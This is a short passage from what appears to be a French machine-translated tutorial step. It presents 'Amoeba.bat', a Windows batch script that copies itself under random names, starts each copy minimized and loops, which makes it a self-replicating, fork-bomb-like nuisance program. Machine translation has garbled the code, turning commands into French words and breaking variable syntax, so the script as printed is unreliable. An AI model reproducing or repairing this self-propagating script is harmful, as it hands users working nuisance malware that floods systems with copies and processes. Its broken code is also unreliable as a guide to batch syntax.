Étape 2: L’amibe Fossilizing
Le script va comme ceci :
hors
couleur 02
titre Amoeba
Set/a vie = 2
: Top
Si la vie % == 0 ()
renommer %name%.dat %0
)
nom du jeu =
: Boucle
Set/a namenumber = % RANDOM % / (32767 / 25)
Set/a namenumber = % RANDOM % / (32767 / 25)
Set/a namenumber = % RANDOM % / (32767 / 25)
Si % namenumber % == 0 set nom = un %Name%
Si % namenumber % == 1 set nom = B % Name%
Si % namenumber % == 2 set nom = D % Name%
Si % namenumber % == 3 set nom = D % Name%
Si % namenumber % == 4 set nom = E % Name%
Si % namenumber % == 5 set nom = F % Name%
Si % namenumber % == 6 set nom = G % Name%
Si % namenumber % == 7 set nom = H % Name%
Si % namenumber % == 8 set nom = I % Name%
Si % namenumber % == 9 set nom = J % Name%
Si % namenumber % == 10 set nom = K % Name%
Si % namenumber % == 11 set nom = L % Name%
Si % namenumber % == 12 set nom = M % Name%
Si % namenumber % == 13 set nom = N % Name%
Si % namenumber % == 14 nom de jeu = O % Name%
Si % namenumber % == 15 set nom = P % Name%
Si % namenumber % == 16 set nom = Q % Name%
Si % namenumber % == 17 set nom = R % Name%
Si % namenumber % == 18 set nom = S % Name%
Si % namenumber % == 19 set nom = T % Name%
Si % namenumber % == 20 set nom = U % Name%
Si % namenumber % == 21 set nom = V % Name%
Si % namenumber % == 22 set nom = W % Name%
Si % namenumber % == 23 set nom = X % Name%
Si % namenumber % == 24 set nom = Y %Name%
Si % namenumber % == 25 set nom = Z % Name%
Si EXIST %name%.bat goto boucle
Si EXIST %name%.dat goto boucle
Copiez %0 %name%.bat > nul
commencer à %name%.bat/min
Set/a vie = % vie -1
Goto Top
Une fois de plus, enregistrez sous « Amoeba.bat ».